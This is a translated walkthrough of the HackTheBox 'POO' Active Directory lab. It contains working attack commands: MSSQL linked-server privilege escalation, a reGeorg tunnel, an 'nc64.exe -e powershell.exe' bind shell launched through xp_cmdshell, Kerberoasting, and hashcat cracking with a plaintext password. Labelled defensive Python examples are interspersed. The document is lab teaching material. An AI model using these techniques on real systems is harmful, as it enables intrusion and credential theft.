HackTheBoxendgame. Passage of the laboratory Professional Offensive Operations. Pentest Active Directory

In this article, we will analyze the passage of not just a machine, but an entire mini-laboratory from the site HackTheBox.

As stated in the description, POO is designed to test skills at all stages of attacks in a small Active Directory environment. The goal is to compromise an available host, escalate privileges, and eventually compromise the entire domain by collecting 5 flags in the process.

The connection to the laboratory is via VPN. It is recommended not to connect from a work computer or from a host that holds data important to you, since you join a private network shared with people who know a thing or two about information security 🙂

Organizational information

So that you can find out about new articles, software and other information, I created a Telegram channel and a group to discuss any issues in the field of information security. I will also look at your personal requests, questions, suggestions and recommendations and reply to everyone.

All information is provided for educational purposes only. The author of this document assumes no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained as a result of studying this document.

Intro

This endgame consists of two machines and contains 5 flags.

The description and address of the available host is also given.

Let's start!

Recon flag

This machine has the IP address 10.13.38.11, which I add to /etc/hosts.

10.13.38.11 poo.htb

The first step is to scan open ports. Since scanning all ports with nmap takes a long time, I first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at a rate of 500 packets per second.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

Now, to get more detailed information about the services that run on the ports, let's run a scan with the -A option.

nmap -A poo.htb -p80,1433

Thus, we have IIS and MSSQL services. From this scan we can also find out the real DNS names of the domain and of the computer. On the web server we are greeted by the default IIS home page.

Let's brute-force the directories. I use gobuster for this. In the parameters we specify the number of threads, 128 (-t), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

Thus, we have HTTP authentication on the /admin directory, and a .DS_Store (Desktop Services Store) file is available. .DS_Store files store macOS Finder settings for a folder, such as the list of files, icon positions and the selected background image. Such a file can be accidentally deployed to a web server directory by web developers, and it leaks the names of the directory's contents. To extract them you can use DS_Store crawler.

python3 dsstore_crawler.py -i http://poo.htb/

We get the contents of the directory. The most interesting item here is the /dev directory, which contains source and db files for two branches. We cannot list the files directly, but if the server is vulnerable to IIS short name (8.3 filename) disclosure, we can learn the first 6 characters of file and directory names. You can check for this vulnerability with IIS shortname Scanner.

And we find one text file that starts with "poo_co". Not knowing what to do next, I simply selected from the dictionary of directories all the words that begin with "co".

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

And iterate with wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

And we find the right word! We look at this file and save the credentials (judging by the DBNAME parameter, they are for MSSQL).

HackTheBoxendgame. Passage of the laboratory Professional Offensive Operations. Pentest Active Directory

We submit the flag and advance by 20%.

Huh flag

We connect to MSSQL; I use DBeaver.

We do not find anything interesting in this database, so let's open an SQL editor and check which logins exist.

SELECT name FROM master..syslogins;

We have two users. Let's check our privileges.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

Thus, we have no server-level privileges. Let's look at the linked servers; I wrote about this technique in detail here.

SELECT * FROM master..sysservers;

So we find another SQL Server instance. Let's check whether we can execute queries on this server using openquery().

SELECT version FROM openquery("COMPATIBILITY\POO_CONFIG", 'select @@version as version');

And we can even build a query tree.

SELECT version FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITY\POO_PUBLIC", ''select @@version as version'');');

The important point is that when we send a query to a linked server, the query is executed in the context of a different login, the one configured in the linked server's login mapping! Let's see which user context we get on the linked server.

SELECT name FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT user_name() as name');

And now let's see in which context a query that goes from the linked server back to our own server is executed!

SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT user_name() as name'');');

Thus, it runs in the dbo context, which should have all privileges. Let's check the server-role privileges when the query arrives from the linked server.

SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITY\POO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

As you can see, we have all the privileges! Let's create our own admin login. Such statements cannot be run through openquery(), so we do it with EXECUTE ... AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
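The hop-and-return chain above works only because each linked server maps incoming logins to a fixed remote login, and the mapping on the way back lands in a sysadmin context. The following is an added example, not code from the original article or a tool used in it, that audits such mappings from the defender's side: given the linked-server and login-mapping data an administrator would export from sys.servers and sys.linked_logins on each instance, it searches for any non-sysadmin login that can reach a sysadmin context by following one or more hops, including a hop back to the instance it started on. The instance names, logins and mappings are constructed sample data (the lab's real configuration is not reproduced), and the DEFAULT key stands for the sys.linked_logins row with local_principal_id = 0, which applies to every login that has no explicit row.

```python
"""Audit MSSQL linked-server login mappings for hop-based privilege escalation.

Added example for this write-up; the instances, logins and mappings below are
constructed sample data, not the lab's real configuration.
"""
from collections import deque
from dataclasses import dataclass, field

# Stands for the sys.linked_logins row with local_principal_id = 0: the
# mapping applied to every local login that has no explicit row of its own.
DEFAULT = "*"


@dataclass
class LinkedServer:
    """One sys.servers row plus its sys.linked_logins rows (simplified)."""
    name: str                       # name of the remote instance
    is_rpc_out_enabled: bool        # EXECUTE (...) AT needs this to be on
    # local login -> (uses_self_credential, remote_name)
    logins: dict = field(default_factory=dict)


@dataclass
class Instance:
    name: str
    logins: set                     # server principals that exist here
    sysadmins: set                  # members of the sysadmin server role
    linked: list = field(default_factory=list)


def effective_remote_login(link, local_login):
    """Resolve which remote login a local login becomes across this link."""
    mapping = link.logins.get(local_login, link.logins.get(DEFAULT))
    if mapping is None:
        return None                 # no mapping: the connection is refused
    uses_self_credential, remote_name = mapping
    return local_login if uses_self_credential else remote_name


def reachable_sysadmin(instances, start_instance, start_login, max_hops=4):
    """Breadth-first search over (instance, login) states.

    Returns the list of hops (src, src_login, dst, dst_login, rpc_out) that
    first lands in a sysadmin context on any instance, or None.
    """
    by_name = {i.name: i for i in instances}
    start = (start_instance, start_login)
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        (inst_name, login), path = queue.popleft()
        inst = by_name[inst_name]
        if path and login in inst.sysadmins:
            return path
        if len(path) >= max_hops:
            continue
        for link in inst.linked:
            remote_login = effective_remote_login(link, login)
            if remote_login is None or link.name not in by_name:
                continue
            state = (link.name, remote_login)
            if state in seen:
                continue
            seen.add(state)
            hop = (inst_name, login, link.name, remote_login, link.is_rpc_out_enabled)
            queue.append((state, path + [hop]))
    return None


def audit(instances):
    """Map every non-sysadmin login to the hop chain that makes it sysadmin."""
    findings = {}
    for inst in instances:
        for login in sorted(inst.logins - inst.sysadmins):
            path = reachable_sysadmin(instances, inst.name, login)
            if path:
                findings[(inst.name, login)] = path
    return findings


# Constructed sample: two instances linked to each other with fixed logins.
SAMPLE = [
    Instance(
        name="PUBLIC_INSTANCE",
        logins={"sa", "webapp"},
        sysadmins={"sa"},
        linked=[LinkedServer("CONFIG_INSTANCE", True, {DEFAULT: (False, "config_reader")})],
    ),
    Instance(
        name="CONFIG_INSTANCE",
        logins={"sa", "config_reader"},
        sysadmins={"sa"},
        linked=[LinkedServer("PUBLIC_INSTANCE", True, {DEFAULT: (False, "sa")})],
    ),
]

if __name__ == "__main__":
    for (inst, login), path in audit(SAMPLE).items():
        chain = " -> ".join(f"{dst}:{dst_login}" for _, _, dst, dst_login, _ in path)
        print(f"{inst}:{login} -> {chain}  (sysadmin reached in {len(path)} hop(s))")
```

In the sample, the low-privileged webapp login on PUBLIC_INSTANCE reaches sysadmin in two hops, exactly the shape of the chain used above. The fix the audit points at is to map logins with uses_self_credential (so the remote side sees the caller's own, equally limited identity) or to a dedicated low-privilege remote login, and to leave rpc out disabled on links that do not need EXECUTE ... AT.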

And now we connect with the credentials of the new login and see the new flag database.

We submit this flag and move on.

Backtrack flag

Let's get a shell through MSSQL; I'm using mssqlclient.py from the impacket package.

mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC

We need to find passwords, and the first thing we have already come across is the website. So we need the web server config (we cannot get a convenient reverse shell; apparently a firewall is in the way).

But access is denied. However, we can read the file through MSSQL; we just need to know which external script languages are configured. In the MSSQL directory we find that Python is installed.

Then reading the web.config file is no problem.

EXEC sp_execute_external_script
@language = N'Python',
@script = N'print(open(r"C:\inetpub\wwwroot\web.config").read())';

With the credentials found, go to /admin and pick up the flag.

foothold flag

The firewall causes some inconvenience, but looking through the network settings we notice that IPv6 is also in use!

Add this address to /etc/hosts.

dead:babe::1001 poo6.htb

Let's scan the host again, but this time over IPv6.

And the WinRM service is available over IPv6. Let's connect with the found credentials.

There is a flag on the desktop; we submit it.

P00ned flag

After reconnaissance on the host with winPEAS we find nothing special. So it was decided to look for credentials again (I also wrote an article on this topic). But I couldn't get all the SPNs from the system via WinRM.

setspn.exe -T intranet.poo -Q */*

Let's execute the command via MSSQL.

In this way we learn that the users p00_hr and p00_adm have SPNs registered, which means they are vulnerable to Kerberoasting. In short, we can request service tickets encrypted with keys derived from their passwords and crack those offline.

First we need a stable shell as the MSSQL service user. But our access is limited: we can reach the host only through ports 80 and 1433. However, it is possible to tunnel traffic through port 80! For this we use reGeorg. Let's upload the tunnel.aspx file to the home directory of the web server, C:\inetpub\wwwroot.

But when we try to access it, we get a 404 error. This means that *.aspx files are not being handled. To make files with this extension run, we install ASP.NET 4.5 as follows.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

And now, when accessing tunnel.aspx, we get the answer that everything is ready to go.

Let's start the client part of the application, which relays traffic. It opens a local SOCKS proxy on port 5432 and forwards everything sent to it through the tunnel to the server.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
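A tunnel like this leaves a distinctive trace in the IIS logs: one client hammering a single script with a dense stream of POST requests, which is what a defender would look for. The following is an added example, not code from the original article or from the reGeorg project, that parses an IIS W3C log excerpt and reports client/script pairs whose POST rate within a sliding window exceeds a threshold. The log lines, addresses, timestamps and the tunnel.aspx name are constructed sample data, and the field layout is read from the #Fields directive so that the parser does not depend on a fixed column order.

```python
"""Spot HTTP-tunnel traffic (reGeorg-style) in IIS W3C logs.

Added example for this write-up, not a tool from it. The log excerpt is
constructed: addresses, times and the script name are made up.
"""
import datetime as dt
from collections import defaultdict

# Constructed IIS W3C log excerpt. IIS writes spaces inside a field as '+',
# so every line splits cleanly on whitespace.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status time-taken
2020-01-15 10:00:01 10.0.0.2 GET /index.html - 80 10.0.0.50 Mozilla/5.0+(Windows+NT+10.0) 200 3
2020-01-15 10:00:02 10.0.0.2 GET /login.aspx - 80 10.0.0.51 Mozilla/5.0+(Windows+NT+10.0) 200 5
2020-01-15 10:00:04 10.0.0.2 POST /login.aspx - 80 10.0.0.51 Mozilla/5.0+(Windows+NT+10.0) 302 9
2020-01-15 10:00:05 10.0.0.2 POST /tunnel.aspx - 80 10.0.0.50 python-requests/2.22.0 200 12
2020-01-15 10:00:06 10.0.0.2 POST /tunnel.aspx - 80 10.0.0.50 python-requests/2.22.0 200 8
2020-01-15 10:00:06 10.0.0.2 POST /tunnel.aspx - 80 10.0.0.50 python-requests/2.22.0 200 7
2020-01-15 10:00:07 10.0.0.2 POST /tunnel.aspx - 80 10.0.0.50 python-requests/2.22.0 200 9
2020-01-15 10:00:09 10.0.0.2 POST /tunnel.aspx - 80 10.0.0.50 python-requests/2.22.0 200 11
2020-01-15 10:00:12 10.0.0.2 POST /tunnel.aspx - 80 10.0.0.50 python-requests/2.22.0 200 6
2020-01-15 10:05:30 10.0.0.2 POST /login.aspx - 80 10.0.0.51 Mozilla/5.0+(Windows+NT+10.0) 302 10
"""


def parse_iis_log(text):
    """Return one dict per request, keyed by the names in the #Fields line."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # column order comes from the log itself
            continue
        if line.startswith("#"):
            continue                        # other directives (#Software, #Date, ...)
        if fields is None:
            raise ValueError("log data appears before a #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue                        # skip a truncated or malformed line
        row = dict(zip(fields, values))
        row["ts"] = dt.datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def find_tunnel_candidates(rows, window_seconds=60, min_posts=5):
    """Report (client, path, count) where one client sent at least min_posts
    POST requests to the same path inside any window_seconds-long window."""
    stamps_by_key = defaultdict(list)
    for r in rows:
        if r["cs-method"] == "POST":
            stamps_by_key[(r["c-ip"], r["cs-uri-stem"])].append(r["ts"])
    hits = []
    for (client, path), stamps in stamps_by_key.items():
        stamps.sort()
        best = 0
        start = 0
        for end in range(len(stamps)):          # two-pointer sliding window
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_posts:
            hits.append((client, path, best))
    return sorted(hits)


if __name__ == "__main__":
    for client, path, count in find_tunnel_candidates(parse_iis_log(SAMPLE_LOG)):
        print(f"{client} sent {count} POSTs to {path} within 60s: possible tunnel or web shell")
```

On real logs the thresholds need tuning per application (an API endpoint legitimately receives bursts of POSTs), so the count is combined with other signals from the same rows: a script that was never requested before, an unusual user agent, and a path that does not belong to the deployed application.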

And we use proxychains to send the traffic of any application through our proxy. Let's add this proxy to the /etc/proxychains.conf configuration file.

Now let's upload netcat (nc64.exe) to the server, with which we will create a stable bind shell, and the Invoke-Kerberoast script, with which we will perform the Kerberoasting attack.

Now, through MSSQL, we launch the listener.

xp_cmdshell 'C:\temp\nc64.exe -e powershell.exe -lvp 4321'

And we connect through our proxy.

proxychains rlwrap nc poo.htb 4321

And let's get the hashes.

. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -ErrorAction SilentlyContinue -OutputFormat Hashcat | Select-Object Hash | Out-File -FilePath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt

Next, we need to crack these hashes. Since the passwords were not in rockyou, I used ALL the password wordlists provided in SecLists. For cracking we use hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

And we find both passwords, the first in the dutch_passwordlist.txt dictionary, and the second in Keyboard-Combinations.txt.
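From the blue-team side, the ticket requests made above are logged on the domain controller as event 4769 (a Kerberos service ticket was requested), and the usual tell is one account requesting RC4-encrypted (TicketEncryptionType 0x17) tickets for several user-held SPNs in a short time. The following is an added example, not code from the original article or from Invoke-Kerberoast, that runs that check over a handful of constructed 4769 events. The requesting accounts, timestamps and addresses are made up; the service names p00_hr and p00_adm are reused from the write-up only as sample data.

```python
"""Flag Kerberoasting from Windows event 4769 (service ticket requested).

Added example for this write-up; the events below are constructed and the
requesting accounts are hypothetical.
"""
import datetime as dt
from collections import defaultdict

RC4_HMAC = "0x17"          # TicketEncryptionType value for RC4-HMAC tickets
AES256 = "0x12"

# Constructed 4769 events, reduced to the fields the detection needs.
SAMPLE_EVENTS = [
    {"TimeCreated": "2020-01-15T09:00:10", "TargetUserName": "j.doe@INTRANET.POO",
     "ServiceName": "DC01$", "TicketEncryptionType": AES256, "Status": "0x0",
     "IpAddress": "::ffff:10.0.0.50"},
    {"TimeCreated": "2020-01-15T10:05:00", "TargetUserName": "j.doe@INTRANET.POO",
     "ServiceName": "p00_hr", "TicketEncryptionType": RC4_HMAC, "Status": "0x0",
     "IpAddress": "::ffff:10.0.0.50"},
    {"TimeCreated": "2020-01-15T10:05:03", "TargetUserName": "j.doe@INTRANET.POO",
     "ServiceName": "p00_adm", "TicketEncryptionType": RC4_HMAC, "Status": "0x0",
     "IpAddress": "::ffff:10.0.0.50"},
    {"TimeCreated": "2020-01-15T11:00:00", "TargetUserName": "a.smith@INTRANET.POO",
     "ServiceName": "sqlsvc", "TicketEncryptionType": RC4_HMAC, "Status": "0x0",
     "IpAddress": "::ffff:10.0.0.51"},
    {"TimeCreated": "2020-01-15T11:00:05", "TargetUserName": "b.lee@INTRANET.POO",
     "ServiceName": "p00_hr", "TicketEncryptionType": RC4_HMAC, "Status": "0x12",
     "IpAddress": "::ffff:10.0.0.52"},
]


def parse_time(value):
    return dt.datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def is_user_service_account(service_name):
    """Computer accounts end in '$' and krbtgt is the KDC itself; neither is a
    Kerberoasting target, so only SPNs held by user accounts count."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoast(events, window_seconds=300, min_services=2):
    """Return (requesting account, [service accounts]) for every account that
    obtained RC4 tickets for at least min_services distinct user-held SPNs
    within any window_seconds-long window."""
    per_user = defaultdict(list)
    for e in events:
        if e.get("Status") != "0x0":
            continue                            # failed request, no ticket issued
        if e.get("TicketEncryptionType") != RC4_HMAC:
            continue                            # AES tickets are not the roasting pattern
        if not is_user_service_account(e["ServiceName"]):
            continue
        per_user[e["TargetUserName"]].append((parse_time(e["TimeCreated"]), e["ServiceName"]))
    alerts = []
    for user, requests in per_user.items():
        requests.sort()
        best = set()
        for i, (t0, _) in enumerate(requests):   # window anchored at each request
            in_window = {svc for t, svc in requests[i:]
                         if (t - t0).total_seconds() <= window_seconds}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_services:
            alerts.append((user, sorted(best)))
    return sorted(alerts)


if __name__ == "__main__":
    for user, services in detect_kerberoast(SAMPLE_EVENTS):
        print(f"{user} requested RC4 tickets for {', '.join(services)}: possible Kerberoasting")
```

The RC4 filter is what makes the rule cheap: a domain whose service accounts are AES-only and whose legitimate clients negotiate AES produces almost no 0x17 tickets for user SPNs, so each one is worth a look. The distinct-service threshold then separates a tool that sweeps every SPN from a single legacy client. Long, random service-account passwords (or group Managed Service Accounts) remove the payoff of the attack regardless of detection.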

So now we have three users, and we head for the domain controller. First let's find out its address.

Great, we have learned the IP address of the domain controller. Let's enumerate all users of the domain and find out which of them are administrators. To gather this information we download the PowerView.ps1 script. Then we connect using evil-winrm, specifying the directory with the script in the -s parameter, and simply load the PowerView script.

Now we have access to all its functions. The p00_adm user looks like a privileged user, so we will work in its context. Let's create a PSCredential object for this user.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

Now every PowerShell command in which we pass $Creds will be executed on behalf of p00_adm. Let's display the list of users together with the AdminCount attribute.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

So our user really is privileged. Let's see which groups he belongs to.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

We finally confirm that the user is a domain administrator. This gives him the right to log on to the domain controller remotely. Let's try to log in over WinRM through our tunnel. I was confused by the errors issued by reGeorg when using evil-winrm.

So we use another, simpler script to connect to WinRM. We open it and change the connection parameters.

We try to connect, and we are in the system.

But there is no flag. So we look at the users and check their desktops.

On mr3ks's desktop we find the flag, and the laboratory is 100% complete.

That's all. As feedback, comment on whether you learned something new from this article and whether it was useful to you.

You can join us at Telegram. There you can find interesting materials, merged courses, as well as software. Let's gather a community in which there will be people who understand many areas of IT, then we can always help each other on any IT and information security issues.

Source: habr.com
